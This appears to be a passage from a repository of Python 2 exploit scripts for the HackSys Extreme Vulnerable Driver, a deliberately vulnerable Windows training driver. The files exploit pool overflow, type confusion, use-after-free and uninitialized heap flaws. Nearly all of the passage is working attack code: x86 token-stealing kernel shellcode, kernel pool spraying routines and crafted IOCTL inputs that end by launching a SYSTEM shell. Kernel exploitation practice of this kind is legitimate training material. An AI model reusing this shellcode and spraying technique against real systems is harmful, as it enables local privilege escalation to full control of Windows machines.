and data to the driver..." 123 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 124 | None, 125 | None, 126 | None, 127 | byref(IoStatusBlock), 128 | IOCTL_VULN, 129 | inputbuffer, 130 | inputbuffer_size, 131 | None, 132 | 0x0 133 | ) 134 | 135 | if 'system' in os.popen('whoami').read(): 136 | print "[+] Getting system shell..." 
137 | os.system("cmd.exe") 138 | else: 139 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /HEVD/hacksysPOOL-kex.py: -------------------------------------------------------------------------------- 1 | from kex import * 2 | from ctypes import * 3 | from ctypes.wintypes import * 4 | import os 5 | 6 | #EXPLOIT 7 | 8 | if __name__ == '__main__': 9 | print "[*] HackSysExtremeVulnerableDriver pool overflow privilige escalation" 10 | 11 | IOCTL_VULN = ctl_code(0x803) # 12 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 13 | dwReturn = c_ulong() 14 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 15 | 16 | required_hole_size = 0x200 17 | good_object = find_object_to_spray(required_hole_size) 18 | #allocate input 19 | size = 0x1F8 + len(pool_overwrite(required_hole_size,good_object)) 20 | input = 0x1F8 * "\x42" + pool_overwrite(required_hole_size,good_object) 21 | alloc_memory(0x41410000, input, size) 22 | 23 | #alloc pointer to CloseProcedure 24 | stuff = "\x42\x42\x42\x42" 25 | alloc_memory(0x00000060, stuff, 0x4) 26 | 27 | #allocate shellcode in memory 28 | SHELLCODE = tokenstealing(RETVAL = "") 29 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (size - 0x10 - len(SHELLCODE)) 30 | alloc_memory(0x42424242, stuff, size) 31 | 32 | #spray the heap with EventObjects 33 | gimme_the_hole(required_hole_size) 34 | 35 | inputbuffer = 0x41410000 #memory address of the input buffer 36 | inputbuffer_size = size 37 | outputbuffer_size = 0x0 38 | IoStatusBlock = c_ulong() 39 | if driver_handle: 40 | print "[+] Talking to the driver sending vulnerable IOCTL..." 41 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 42 | None, 43 | None, 44 | None, 45 | byref(IoStatusBlock), 46 | IOCTL_VULN, 47 | inputbuffer, 48 | inputbuffer_size, 49 | None, 50 | 0x0 51 | ) 52 | 53 | print "[+] Getting system shell..." 
54 | close_all_handles() 55 | os.system("cmd.exe") -------------------------------------------------------------------------------- /HEVD/hacksysPOOL.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | import struct 5 | 6 | handles = {} 7 | 8 | GENERIC_READ = 0x80000000 9 | GENERIC_WRITE = 0x40000000 10 | OPEN_EXISTING = 0x3 11 | 12 | MEM_COMMIT = 0x00001000 13 | MEM_RESERVE = 0x00002000 14 | PAGE_EXECUTE_READWRITE = 0x00000040 15 | STATUS_SUCCESS = 0 16 | 17 | METHOD_NEITHER = 0x3 18 | FILE_ANY_ACCESS = 0x0 19 | FILE_DEVICE_UNKNOWN = 0x00000022 20 | 21 | 22 | kernel32 = windll.kernel32 23 | ntdll = windll.ntdll 24 | 25 | def ctl_code(function, 26 | devicetype = FILE_DEVICE_UNKNOWN, 27 | access = FILE_ANY_ACCESS, 28 | method = METHOD_NEITHER): 29 | """Recreate CTL_CODE macro to generate driver IOCTL""" 30 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 31 | 32 | def alloc_memory(base_address, input, input_size): 33 | """ 34 | Allocate input buffer 35 | """ 36 | print "[*] Allocating input buffer at %s" % hex(base_address) 37 | base_address_c = c_int(base_address) 38 | input_size_c = c_int(input_size) 39 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 40 | POINTER(c_int), 41 | c_ulong, 42 | POINTER(c_int), 43 | c_int, 44 | c_int] 45 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 46 | byref(base_address_c), 47 | 0x0, 48 | byref(input_size_c), 49 | MEM_RESERVE|MEM_COMMIT, 50 | PAGE_EXECUTE_READWRITE) 51 | if dwStatus != STATUS_SUCCESS: 52 | print "[-] Error while allocating memory: %s" % dwStatus 53 | getLastError() 54 | sys.exit() 55 | written = c_ulong() 56 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 57 | if alloc == 0: 58 | print "[-] Error while writing our input buffer memory: %s" % alloc 59 | getLastError() 60 | sys.exit() 61 | 62 | def tokenstealingx86(RETVAL, 
extra = ""): 63 | """ 64 | Retrun a token stealing shellcode 65 | """ 66 | #Windows 7 SP1 x86 67 | KPROCESS = '\x50' 68 | TOKEN = '\xF8' 69 | UPID = '\xB4' 70 | APLINKS = '\xB8' 71 | 72 | shellcode = ( 73 | "\x60" # pushad 74 | "\x33\xc0" # xor eax,eax 75 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 76 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 77 | "\x8b\xc8" # mov ecx,eax 78 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 79 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 80 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 81 | "\x75\xec" # jne 0xe 82 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 83 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 84 | "\x61" # popad 85 | ) 86 | 87 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 88 | 89 | if RETVAL == "": 90 | shellcode += "\xc3" #retn 91 | else: 92 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 93 | 94 | return shellcode 95 | 96 | def spray(): 97 | """Spray the Kernel Pool with Event Objects. Each object 98 | is 0x20 bytes in length and is allocated from the Nonpaged kernel pool""" 99 | global handles 100 | handles = {} 101 | for i in range(0, 50000): 102 | hHandle = HANDLE(0) 103 | hHandle = kernel32.CreateEventA(None, False, False, None) 104 | handles[i]=hHandle 105 | print "[+] Spray done!" 106 | 107 | def make_holes(): 108 | global handles 109 | for i in range(0, 50000,16): 110 | for j in range(0,8): 111 | kernel32.CloseHandle(handles[i + j]) 112 | handles[i + j] = None 113 | print "[+] Making holes done!" 114 | 115 | def free_all(): 116 | print "[*] Triggering shellcode!" 117 | global handles 118 | for i in range(0, 50000): 119 | if (handles[i] != None): 120 | kernel32.CloseHandle(handles[i]) 121 | handles[i] = None 122 | print "[+] Free pool allocations done!" 
123 | 124 | def pool_overwrite(): 125 | """ 126 | 857adb40 04080040 ee657645 00000000 00000040 127 | 857adb50 00000000 00000000 00000001 00000001 128 | 857adb60 00000000 0008000c 86f8b180 00000000 129 | 857adb70 00040001 00000000 857adb78 857adb78 130 | """ 131 | pool_header = struct.pack("L", 0x04080040) 132 | pool_header += struct.pack("L", 0xee657645) 133 | pool_header += struct.pack("L", 0x00000000) 134 | pool_header += struct.pack("L", 0x00000040) 135 | pool_header += struct.pack("L", 0x00000000) 136 | pool_header += struct.pack("L", 0x00000000) 137 | pool_header += struct.pack("L", 0x00000001) 138 | pool_header += struct.pack("L", 0x00000001) 139 | pool_header += struct.pack("L", 0x00000000) 140 | 141 | #overwrite type index in object to 0x0 from 0xc 142 | type_index = struct.pack("L", 0x00080000) 143 | 144 | return pool_header + type_index 145 | 146 | #EXPLOIT 147 | 148 | if __name__ == '__main__': 149 | print "[*] HackSysExtremeVulnerableDriver pool overflow privilige escalation" 150 | 151 | IOCTL_VULN = ctl_code(0x803) # 152 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 153 | dwReturn = c_ulong() 154 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 155 | 156 | #allocate input 157 | size = 0x1F8 + len(pool_overwrite()) 158 | input = 0x1F8 * "\x42" + pool_overwrite() 159 | alloc_memory(0x41410000, input, size) 160 | 161 | #alloc pointer to CloseProcedure 162 | stuff = "\x42\x42\x42\x42" 163 | alloc_memory(0x00000060, stuff, 0x4) 164 | 165 | #allocate shellcode in memory 166 | SHELLCODE = tokenstealingx86(RETVAL = "") 167 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (size - 0x10 - len(SHELLCODE)) 168 | alloc_memory(0x42424242, stuff, size) 169 | 170 | #spray the heap with EventObjects 171 | spray() 172 | 173 | #make holes on the heap 174 | make_holes() 175 | 176 | inputbuffer = 0x41410000 #memory address of the input buffer 177 | inputbuffer_size = size 178 | outputbuffer_size = 0x0 
179 | IoStatusBlock = c_ulong() 180 | if driver_handle: 181 | print "[*] Sending IOCTL and data to the driver..." 182 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 183 | None, 184 | None, 185 | None, 186 | byref(IoStatusBlock), 187 | IOCTL_VULN, 188 | inputbuffer, 189 | inputbuffer_size, 190 | None, 191 | 0x0 192 | ) 193 | 194 | free_all() 195 | if 'system' in os.popen('whoami').read(): 196 | print "[+] Getting system shell..." 197 | os.system("cmd.exe") 198 | else: 199 | print '[-] Failed to elevate privileges' 200 | -------------------------------------------------------------------------------- /HEVD/hacksysTYPE.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | 5 | GENERIC_READ = 0x80000000 6 | GENERIC_WRITE = 0x40000000 7 | OPEN_EXISTING = 0x3 8 | 9 | MEM_COMMIT = 0x00001000 10 | MEM_RESERVE = 0x00002000 11 | PAGE_EXECUTE_READWRITE = 0x00000040 12 | STATUS_SUCCESS = 0 13 | 14 | METHOD_NEITHER = 0x3 15 | FILE_ANY_ACCESS = 0x0 16 | FILE_DEVICE_UNKNOWN = 0x00000022 17 | 18 | 19 | kernel32 = windll.kernel32 20 | ntdll = windll.ntdll 21 | 22 | def ctl_code(function, 23 | devicetype = FILE_DEVICE_UNKNOWN, 24 | access = FILE_ANY_ACCESS, 25 | method = METHOD_NEITHER): 26 | """Recreate CTL_CODE macro to generate driver IOCTL""" 27 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 28 | 29 | def alloc_memory(base_address, input, input_size): 30 | """ 31 | Allocate input buffer 32 | """ 33 | print "[*] Allocating input buffer at %s" % hex(base_address) 34 | base_address_c = c_int(base_address) 35 | input_size_c = c_int(input_size) 36 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 37 | POINTER(c_int), 38 | c_ulong, 39 | POINTER(c_int), 40 | c_int, 41 | c_int] 42 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 43 | byref(base_address_c), 44 | 0x0, 45 | byref(input_size_c), 46 | MEM_RESERVE|MEM_COMMIT, 47 | 
PAGE_EXECUTE_READWRITE) 48 | if dwStatus != STATUS_SUCCESS: 49 | print "[-] Error while allocating memory: %s" % dwStatus 50 | getLastError() 51 | sys.exit() 52 | written = c_ulong() 53 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 54 | if alloc == 0: 55 | print "[-] Error while writing our input buffer memory: %s" % alloc 56 | getLastError() 57 | sys.exit() 58 | 59 | def tokenstealingx86(RETVAL, extra = ""): 60 | """ 61 | Retrun a token stealing shellcode 62 | """ 63 | #Windows 7 SP1 x86 64 | KPROCESS = '\x50' 65 | TOKEN = '\xF8' 66 | UPID = '\xB4' 67 | APLINKS = '\xB8' 68 | 69 | shellcode = ( 70 | "\x60" # pushad 71 | "\x33\xc0" # xor eax,eax 72 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 73 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 74 | "\x8b\xc8" # mov ecx,eax 75 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 76 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 77 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 78 | "\x75\xec" # jne 0xe 79 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 80 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 81 | "\x61" # popad 82 | ) 83 | 84 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 85 | 86 | if RETVAL == "": 87 | shellcode += "\xc3" #retn 88 | else: 89 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 90 | 91 | return shellcode 92 | 93 | 94 | if __name__ == '__main__': 95 | print "[*] HackSysExtremeVulnerableDriver type confusion privilige escalation" 96 | 97 | 98 | IOCTL_VULN = ctl_code(0x808) # 99 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 100 | dwReturn = c_ulong() 101 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 102 | 103 | #allocate input 104 | size = 0x1000 105 | input = size * "\x42" #the 2nd 4 byte 
will point to our shellcode 106 | alloc_memory(0x41410000, input, size) 107 | 108 | #allocate shellcode in memory 109 | SHELLCODE = tokenstealingx86(RETVAL = "") 110 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (0x1000 - 0x10 - len(SHELLCODE)) 111 | alloc_memory(0x42424242, stuff, 0x1000) 112 | 113 | inputbuffer = 0x41410000 #memory address of the input buffer 114 | inputbuffer_size = 0x1000 115 | outputbuffer_size = 0x0 116 | IoStatusBlock = c_ulong() 117 | if driver_handle: 118 | print "[*] Sending IOCTL and data to the driver..." 119 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 120 | None, 121 | None, 122 | None, 123 | byref(IoStatusBlock), 124 | IOCTL_VULN, 125 | inputbuffer, 126 | inputbuffer_size, 127 | None, 128 | 0x0 129 | ) 130 | 131 | if 'system' in os.popen('whoami').read(): 132 | print "[+] Getting system shell..." 133 | os.system("cmd.exe") 134 | else: 135 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /HEVD/hacksysUAF.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | import struct 5 | from ctypes.wintypes import HANDLE, DWORD 6 | 7 | handles = {} 8 | 9 | GENERIC_READ = 0x80000000 10 | GENERIC_WRITE = 0x40000000 11 | OPEN_EXISTING = 0x3 12 | 13 | MEM_COMMIT = 0x00001000 14 | MEM_RESERVE = 0x00002000 15 | PAGE_EXECUTE_READWRITE = 0x00000040 16 | STATUS_SUCCESS = 0 17 | 18 | METHOD_NEITHER = 0x3 19 | FILE_ANY_ACCESS = 0x0 20 | FILE_DEVICE_UNKNOWN = 0x00000022 21 | 22 | 23 | kernel32 = windll.kernel32 24 | ntdll = windll.ntdll 25 | 26 | def ctl_code(function, 27 | devicetype = FILE_DEVICE_UNKNOWN, 28 | access = FILE_ANY_ACCESS, 29 | method = METHOD_NEITHER): 30 | """Recreate CTL_CODE macro to generate driver IOCTL""" 31 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 32 | 33 | def alloc_memory(base_address, input, input_size): 34 
| """ 35 | Allocate input buffer 36 | """ 37 | print "[*] Allocating input buffer at %s" % hex(base_address) 38 | base_address_c = c_int(base_address) 39 | input_size_c = c_int(input_size) 40 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 41 | POINTER(c_int), 42 | c_ulong, 43 | POINTER(c_int), 44 | c_int, 45 | c_int] 46 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 47 | byref(base_address_c), 48 | 0x0, 49 | byref(input_size_c), 50 | MEM_RESERVE|MEM_COMMIT, 51 | PAGE_EXECUTE_READWRITE) 52 | if dwStatus != STATUS_SUCCESS: 53 | print "[-] Error while allocating memory: %s" % dwStatus 54 | getLastError() 55 | sys.exit() 56 | written = c_ulong() 57 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 58 | if alloc == 0: 59 | print "[-] Error while writing our input buffer memory: %s" % alloc 60 | getLastError() 61 | sys.exit() 62 | 63 | def tokenstealingx86(RETVAL, extra = ""): 64 | """ 65 | Retrun a token stealing shellcode 66 | """ 67 | #Windows 7 SP1 x86 68 | KPROCESS = '\x50' 69 | TOKEN = '\xF8' 70 | UPID = '\xB4' 71 | APLINKS = '\xB8' 72 | 73 | shellcode = ( 74 | "\x60" # pushad 75 | "\x33\xc0" # xor eax,eax 76 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 77 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 78 | "\x8b\xc8" # mov ecx,eax 79 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 80 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 81 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 82 | "\x75\xec" # jne 0xe 83 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 84 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 85 | "\x61" # popad 86 | ) 87 | 88 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 89 | 90 | if RETVAL == "": 91 | shellcode += "\xc3" #retn 92 | else: 93 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 94 | 95 | return 
shellcode 96 | 97 | def spray(): 98 | """Spray the Kernel Pool with IO_COMPLETION_OBJECT. Each object 99 | is 0x60 bytes in length and is allocated from the Nonpaged kernel pool""" 100 | global handles 101 | handles = {} 102 | IO_COMPLETION_OBJECT = 1 103 | for i in range(0, 50000): 104 | hHandle = HANDLE(0) 105 | ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT) 106 | handles[i]=hHandle.value 107 | print "[+] Spray done!" 108 | 109 | def make_holes(): 110 | global handles 111 | for i in range(0, 50000,16): 112 | kernel32.CloseHandle(handles[i]) 113 | handles[i] = None 114 | print "[+] Making holes done!" 115 | 116 | def free_all(): 117 | #print "[+] Triggering shellcode!" 118 | global handles 119 | for i in range(0, 50000): 120 | if (handles[i] != None): 121 | kernel32.CloseHandle(handles[i]) 122 | handles[i] = None 123 | print "[+] Free pool allocations done!" 124 | 125 | 126 | #EXPLOIT 127 | 128 | if __name__ == '__main__': 129 | print "[*] HackSysExtremeVulnerableDriver UAF privilige escalation" 130 | 131 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 132 | dwReturn = c_ulong() 133 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 134 | 135 | #allocate input, this will be copied to fake object 136 | size = 0x58 137 | input = 0x57 * "\x42" + "\x00" 138 | alloc_memory(0x41410000, input, size) 139 | 140 | #allocate shellcode in memory 141 | scsize = 0x100 142 | SHELLCODE = tokenstealingx86(RETVAL = "") 143 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (scsize - 0x10 - len(SHELLCODE)) 144 | alloc_memory(0x42424242, stuff, scsize) 145 | 146 | inputbuffer = 0x41410000 #memory address of the input buffer 147 | inputbuffer_size = size 148 | outputbuffer_size = 0x0 149 | IoStatusBlock = c_ulong() 150 | 151 | #spray the heap with EventObjects 152 | spray() 153 | 154 | #make holes on the heap 155 | make_holes() 156 | 157 | 158 | #allocate UAF object 159 | IOCTL_VULN = 
ctl_code(0x804) #HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT 160 | if driver_handle: 161 | print "[+] Allocate UAF object..." 162 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 163 | None, 164 | None, 165 | None, 166 | byref(IoStatusBlock), 167 | IOCTL_VULN, 168 | inputbuffer, 169 | inputbuffer_size, 170 | None, 171 | 0x0 172 | ) 173 | 174 | #free UAF object 175 | IOCTL_VULN = ctl_code(0x806) #HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT 176 | if driver_handle: 177 | print "[+] Free UAF object..." 178 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 179 | None, 180 | None, 181 | None, 182 | byref(IoStatusBlock), 183 | IOCTL_VULN, 184 | inputbuffer, 185 | inputbuffer_size, 186 | None, 187 | 0x0 188 | ) 189 | 190 | #allocate fake object 191 | IOCTL_VULN = ctl_code(0x807) #HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT 192 | if driver_handle: 193 | print "[+] Allocate plenty of fake objects..." 194 | for i in range(0, 50000,16): 195 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 196 | None, 197 | None, 198 | None, 199 | byref(IoStatusBlock), 200 | IOCTL_VULN, 201 | inputbuffer, 202 | inputbuffer_size, 203 | None, 204 | 0x0 205 | ) 206 | 207 | free_all() 208 | #use UAF object 209 | IOCTL_VULN = ctl_code(0x805) #HACKSYS_EVD_IOCTL_USE_UAF_OBJECT 210 | if driver_handle: 211 | print "[+] Use UAF object..." 212 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 213 | None, 214 | None, 215 | None, 216 | byref(IoStatusBlock), 217 | IOCTL_VULN, 218 | inputbuffer, 219 | inputbuffer_size, 220 | None, 221 | 0x0 222 | ) 223 | 224 | 225 | 226 | if 'system' in os.popen('whoami').read(): 227 | print "[+] Getting system shell..." 
228 | os.system("cmd.exe") 229 | else: 230 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /HEVD/hacksysUIHEAP.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | import struct 5 | 6 | handles = {} 7 | 8 | GENERIC_READ = 0x80000000 9 | GENERIC_WRITE = 0x40000000 10 | OPEN_EXISTING = 0x3 11 | 12 | MEM_COMMIT = 0x00001000 13 | MEM_RESERVE = 0x00002000 14 | PAGE_EXECUTE_READWRITE = 0x00000040 15 | STATUS_SUCCESS = 0 16 | 17 | METHOD_NEITHER = 0x3 18 | FILE_ANY_ACCESS = 0x0 19 | FILE_DEVICE_UNKNOWN = 0x00000022 20 | 21 | 22 | kernel32 = windll.kernel32 23 | ntdll = windll.ntdll 24 | 25 | def ctl_code(function, 26 | devicetype = FILE_DEVICE_UNKNOWN, 27 | access = FILE_ANY_ACCESS, 28 | method = METHOD_NEITHER): 29 | """Recreate CTL_CODE macro to generate driver IOCTL""" 30 | return ((devicetype << 16) | (access << 14) | (function << 2) | method) 31 | 32 | def alloc_memory(base_address, input, input_size): 33 | """ 34 | Allocate input buffer 35 | """ 36 | print "[*] Allocating input buffer at %s" % hex(base_address) 37 | base_address_c = c_int(base_address) 38 | input_size_c = c_int(input_size) 39 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, 40 | POINTER(c_int), 41 | c_ulong, 42 | POINTER(c_int), 43 | c_int, 44 | c_int] 45 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, 46 | byref(base_address_c), 47 | 0x0, 48 | byref(input_size_c), 49 | MEM_RESERVE|MEM_COMMIT, 50 | PAGE_EXECUTE_READWRITE) 51 | if dwStatus != STATUS_SUCCESS: 52 | print "[-] Error while allocating memory: %s" % dwStatus 53 | getLastError() 54 | sys.exit() 55 | written = c_ulong() 56 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written)) 57 | if alloc == 0: 58 | print "[-] Error while writing our input buffer memory: %s" % alloc 59 | getLastError() 60 | sys.exit() 61 | 
62 | def tokenstealingx86(RETVAL, extra = ""): 63 | """ 64 | Return the x86 token stealing shellcode as a byte string. The KPROCESS/TOKEN/UPID/APLINKS offsets below are taken from Windows 7 SP1 x86 (see the comment that follows); nothing in this function checks the running OS version. RETVAL: "" appends a plain ret (opcode 0xC3); any other value appends a ret imm16 built as 0xC2 + RETVAL + a zero byte. extra: bytes inserted between the payload and the ret. NOTE(review): the __main__ block of this file calls tokenstealing(...), which is not defined anywhere in the file; this function appears to be the intended callee, as in the sibling scripts. 65 | """ 66 | #Windows 7 SP1 x86 67 | KPROCESS = '\x50' 68 | TOKEN = '\xF8' 69 | UPID = '\xB4' 70 | APLINKS = '\xB8' 71 | 72 | shellcode = ( 73 | "\x60" # pushad 74 | "\x33\xc0" # xor eax,eax 75 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 76 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 77 | "\x8b\xc8" # mov ecx,eax 78 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 79 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 80 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 81 | "\x75\xec" # jne 0xe 82 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 83 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 84 | "\x61" # popad 85 | ) 86 | 87 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 88 | 89 | if RETVAL == "": 90 | shellcode += "\xc3" #retn 91 | else: 92 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 93 | 94 | return shellcode 95 | 96 | def spray(): 97 | """Create 9999 named mutexes via CreateMutexA (each name is 115 'F' bytes followed by the zero-padded index) and record every returned handle in the module-level `handles` dict keyed by index. NOTE(review): the failure check compares the return value with None, but with ctypes' default int restype a failed CreateMutexA comes back as 0, so the error branch is never taken; that branch would also raise NameError, since getLastError() is not defined in this file and sys is not imported here.""" 98 | global handles 99 | handles = {} 100 | for i in range(1, 10000): 101 | hHandle = HANDLE(0) 102 | hHandle = kernel32.CreateMutexA(None, False, "\x46" * ((0xF0-10)/2) + str(i).zfill(4)) 103 | if hHandle == None: 104 | print "[-] Error while creating mutex" 105 | getLastError() 106 | sys.exit() 107 | handles[i]= hHandle 108 | print "[+] Spray done!" 109 | 110 | def make_holes(): """Close every 16th handle recorded by spray() (indices 1, 17, 33, ...) and set those slots of `handles` to None so that free_all() skips them.""" 111 | global handles 112 | for i in range(1, 10000,16): 113 | kernel32.CloseHandle(handles[i]) 114 | handles[i] = None 115 | print "[+] Making holes done!" 116 | 117 | def free_all(): """Close every handle still recorded in `handles` (slots already set to None are skipped) and set each closed slot to None.""" 118 | #print "[+] Triggering shellcode!" 119 | global handles 120 | for i in range(1, 10000): 121 | if (handles[i] != None): 122 | kernel32.CloseHandle(handles[i]) 123 | handles[i] = None 124 | print "[+] Free pool allocations done!" 
125 | 126 | 127 | if __name__ == '__main__': 128 | print "[*] HackSysExtremeVulnerableDriver uninitialized heap variable privilige escalation" 129 | 130 | #allocate input, this will be copied to fake object 131 | size = 0x4 132 | input = struct.pack("L", 0xbad0b0b1) 133 | alloc_memory(0x41410000, input, size) 134 | 135 | #allocate shellcode in memory 136 | scsize = 0x1000 137 | SHELLCODE = tokenstealing(RETVAL = "") 138 | stuff = "\x90" * 0x100 + SHELLCODE + "\x90" * (scsize - 0x100 - len(SHELLCODE)) 139 | alloc_memory(0x00460000, stuff, scsize) 140 | 141 | inputbuffer = 0x41410000 #memory address of the input buffer 142 | inputbuffer_size = size 143 | outputbuffer_size = 0x0 144 | IoStatusBlock = c_ulong() 145 | 146 | #spray the heap with EventObjects 147 | spray() 148 | 149 | #make holes on the heap 150 | make_holes() 151 | 152 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 153 | dwReturn = c_ulong() 154 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 155 | IOCTL_VULN = ctl_code(0x80c) #HACKSYS_EVD_IOCTL_UNINITIALIZED_HEAP_VARIABLE 156 | 157 | if driver_handle: 158 | print "[*] Sending IOCTL and data to the driver..." 159 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 160 | None, 161 | None, 162 | None, 163 | byref(IoStatusBlock), 164 | IOCTL_VULN, 165 | inputbuffer, 166 | inputbuffer_size, 167 | None, 168 | 0x0 169 | ) 170 | free_all() 171 | 172 | if 'system' in os.popen('whoami').read(): 173 | print "[+] Getting system shell..." 
174 | os.system("cmd.exe") 175 | else: 176 | print '[-] Failed to elevate privileges' 177 | -------------------------------------------------------------------------------- /HEVD/hacksysUISTACK.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import os 4 | 5 | GENERIC_READ = 0x80000000 6 | GENERIC_WRITE = 0x40000000 7 | OPEN_EXISTING = 0x3 8 | 9 | MEM_COMMIT = 0x00001000 10 | MEM_RESERVE = 0x00002000 11 | PAGE_EXECUTE_READWRITE = 0x00000040 12 | STATUS_SUCCESS = 0 13 | 14 | METHOD_NEITHER = 0x3 15 | FILE_ANY_ACCESS = 0x0 16 | FILE_DEVICE_UNKNOWN = 0x00000022 17 | 18 | 19 | kernel32 = windll.kernel32 20 | ntdll = windll.ntdll 21 | 22 | def ctl_code(function, 23 | devicetype = FILE_DEVICE_UNKNOWN, 24 | access = FILE_ANY_ACCESS, 25 | method = METHOD_NEITHER): 26 | """Recreate CTL_CODE macro to generate driver IOCTL""" 27 